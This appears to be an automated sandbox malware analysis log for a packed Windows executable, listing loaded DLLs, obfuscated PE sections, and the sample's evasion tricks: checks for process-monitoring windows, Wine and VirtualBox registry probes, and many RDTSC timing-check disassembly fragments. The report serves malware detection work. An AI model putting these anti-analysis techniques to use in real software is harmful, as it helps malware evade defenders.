    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2963456 > 1048576
    Source: file.exeStatic PE information: Raw size of uinrpldy is bigger than: 0x100000 < 0x2aa000

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W;uinrpldy:EW;bdkjvfmn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;uinrpldy:EW;bdkjvfmn:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2e2b59 should be: 0x2d4b8a
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: uinrpldy
    Source: file.exeStatic PE information: section name: bdkjvfmn
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.9847073555245185

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59484B second address: 594852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707CAE second address: 707CDA instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF192480B8h 0x00000008 ja 00007EFF192480C9h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707CDA second address: 707CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707CDF second address: 707D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFF192480C3h 0x0000000e jmp 00007EFF192480BDh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707F9B second address: 707FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007EFF192B60FEh 0x0000000d jng 00007EFF192B60EAh 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7082D7 second address: 7082F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFF192480B6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFF192480C3h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7082F7 second address: 7082FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7082FB second address: 708301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708301 second address: 708307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708307 second address: 70831C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70831C second address: 708320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708320 second address: 708336 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007EFF192480BCh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7084B1 second address: 7084D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192B60F6h 0x00000008 pushad 0x00000009 js 00007EFF192B60E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7084D2 second address: 7084D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A07C second address: 70A0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D2618h], eax 0x0000000c push 00000000h 0x0000000e movzx edi, si 0x00000011 push 277B8F56h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007EFF192B60F5h 0x0000001e push eax 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A0AD second address: 70A137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 277B8FD6h 0x00000010 movsx esi, di 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2B0Dh] 0x0000001b push 00000000h 0x0000001d movsx esi, cx 0x00000020 push 00000003h 0x00000022 or edx, 09456019h 0x00000028 push F4D1B3CCh 0x0000002d pushad 0x0000002e jg 00007EFF192480CCh 0x00000034 jmp 00007EFF192480C6h 0x00000039 jne 00007EFF192480BCh 0x0000003f popad 0x00000040 xor dword ptr [esp], 34D1B3CCh 0x00000047 mov dword ptr [ebp+122D1D61h], edx 0x0000004d add edi, dword ptr [ebp+122D2CE9h] 0x00000053 lea ebx, dword ptr [ebp+12449F4Bh] 0x00000059 and edx, 20CAE82Eh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 jng 00007EFF192480B6h 0x0000006b popad 0x0000006c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A19E second address: 70A1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A1A2 second address: 70A1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFF192480C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A1C7 second address: 70A1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A1CB second address: 70A1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and edi, 5A017D71h 0x0000000e push 00000000h 0x00000010 mov edi, edx 0x00000012 call 00007EFF192480B9h 0x00000017 jmp 00007EFF192480BBh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A1F7 second address: 70A1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A1FC second address: 70A216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A216 second address: 70A230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A230 second address: 70A266 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007EFF192480BCh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jc 00007EFF192480E3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFF192480C4h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A373 second address: 70A405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60F3h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dx, 1400h 0x00000011 xor dword ptr [ebp+122D2955h], ebx 0x00000017 push 00000000h 0x00000019 mov dl, C0h 0x0000001b mov edi, dword ptr [ebp+122D2E59h] 0x00000021 push B3533331h 0x00000026 jmp 00007EFF192B60EBh 0x0000002b add dword ptr [esp], 4CACCD4Fh 0x00000032 sub dword ptr [ebp+122D1D6Bh], eax 0x00000038 push 00000003h 0x0000003a sub ecx, 70FDE648h 0x00000040 push 00000000h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007EFF192B60E8h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e call 00007EFF192B60E9h 0x00000063 jmp 00007EFF192B60EBh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A405 second address: 70A40F instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A40F second address: 70A45F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007EFF192B60F5h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 pushad 0x00000016 jno 00007EFF192B60E6h 0x0000001c jmp 00007EFF192B60EBh 0x00000021 popad 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A45F second address: 70A465 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A465 second address: 70A46A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A46A second address: 70A4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007EFF192480B8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 lea ebx, dword ptr [ebp+12449F5Fh] 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007EFF192480B8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D2618h], esi 0x00000048 xchg eax, ebx 0x00000049 jne 00007EFF192480CEh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A4E7 second address: 70A4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A4EB second address: 70A4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A4EF second address: 70A4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A4F5 second address: 70A50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF332 second address: 6FF338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF338 second address: 6FF33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF33D second address: 6FF367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF192B60F1h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF367 second address: 6FF377 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A36B second address: 72A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A371 second address: 72A375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A375 second address: 72A391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A391 second address: 72A399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A399 second address: 72A39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A689 second address: 72A695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192480B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A695 second address: 72A6A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A7DD second address: 72A810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFF192480B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007EFF192480C1h 0x00000013 jmp 00007EFF192480BBh 0x00000018 jmp 00007EFF192480C3h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AACD second address: 72AAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007EFF192B60F6h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B054 second address: 72B05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72249E second address: 7224A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72BB2E second address: 72BB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72BB33 second address: 72BB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192B60F3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72BCE4 second address: 72BCEE instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFF192480B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73306F second address: 733073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733073 second address: 73307C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73212A second address: 73212E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7332A1 second address: 7332A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7374FF second address: 737503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
